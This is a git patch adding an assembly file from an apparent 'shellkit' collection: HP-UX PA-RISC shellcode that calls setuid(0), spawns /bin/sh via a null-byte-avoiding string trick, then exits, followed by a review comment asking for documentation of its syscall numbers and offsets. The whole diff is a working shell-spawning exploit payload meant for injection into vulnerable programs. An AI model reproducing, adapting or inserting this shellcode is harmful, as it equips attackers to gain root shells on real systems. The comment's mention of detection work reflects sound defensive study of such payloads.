From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001
From: Root THC
Date: Tue, 24 Feb 2026 12:42:47 +0000
Subject: initial

---
 other/shellkit/tmp/hpux-tools/shell-two.s | 41 +++++++++++++++++++++++++++++++
 1 file changed, 41 insertions(+)
 create mode 100644 other/shellkit/tmp/hpux-tools/shell-two.s
(limited to 'other/shellkit/tmp/hpux-tools/shell-two.s')

diff --git a/other/shellkit/tmp/hpux-tools/shell-two.s b/other/shellkit/tmp/hpux-tools/shell-two.s
new file mode 100644
index 0000000..5dac10f
--- /dev/null
+++ b/other/shellkit/tmp/hpux-tools/shell-two.s
@@ -0,0 +1,41 @@
+ .SPACE $TEXT$
+ .SUBSPA $CODE$,QUAD=0,ALIGN=8,ACCESS=44
+
+ .align 4
+ .EXPORT main,ENTRY,PRIV_LEV=3,ARGW0=GR,ARGW1=GR
+main
+
+ bl shellcode, %r1
+ nop
+ .SUBSPA $DATA$
+ .EXPORT shellcode; So we could see it in debugger
+shellcode
+ xor %r26, %r26, %r26; 0 - argv0
+ ldil L%0xc0000000,%r1; entry point
+ ldi 500, %r22 ;
+ ble 0x4(%sr7,%r1) ;
+ subi 523, %r22, %r22 ; setuid(0)
+jump
+ bl .+4,%r1 ; address into %r1
+ addi 500, %r1, %r3;
+ stb %r0, SHELL-jump+7-11-500(%sr0,%r3)
+
+ xor %r25, %r25, %r25; NULL ->arg1
+ ldi SHELL-jump-11-500, %r26;
+ add %r3, %r26, %r26;
+
+ ldil L%0xc0000000,%r1; entry point
+ ldi 500, %r22 ;
+ ble 0x4(%sr7,%r1) ;
+ subi 511, %r22, %r22 ;
+
+ xor %r26, %r26, %r26; return 0
+ ldil L%0xc0000000,%r1; entry point
+ ldi 500, %r22 ;
+ ble 0x4(%sr7,%r1) ;
+ subi 501, %r22, %r22 ; exit
+
+SHELL
+ .STRING "/bin/shA";
+
+endofshellcode
--
cgit v1.3
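Review bot: The new file has no header stating its target (HP-UX on PA-RISC, HP assembler directive syntax) or what the three repeated `ldil L%0xc0000000,%r1` / `ldi 500,%r22` / `ble 0x4(%sr7,%r1)` / `subi N,%r22,%r22` blocks are, so the syscall-gateway convention they rely on and the numbers 500, 523, 511 and 501 read as unexplained magic; the second block (`subi 511, %r22, %r22 ;`) is also the only one with an empty trailing comment, unlike the `setuid(0)` and `exit` blocks. The `stb %r0, SHELL-jump+7-11-500(%sr0,%r3)` line and the matching `ldi SHELL-jump-11-500, %r26` are bare offset arithmetic; a comment such as `; store NUL (%r0) over the trailing 'A' of SHELL so .STRING needs no terminator byte` on the `stb` line, and one stating the assumed value of `%r1` after `bl .+4,%r1`, would make the intent of the `.STRING "/bin/shA"` trick visible to a reader instead of implicit in the constants. A short file header naming the OS/CPU, the gateway-page calling convention, and the meaning of each of the three syscall numbers would make the listing self-describing for anyone reviewing it or deriving detection content from the repeated gateway sequence.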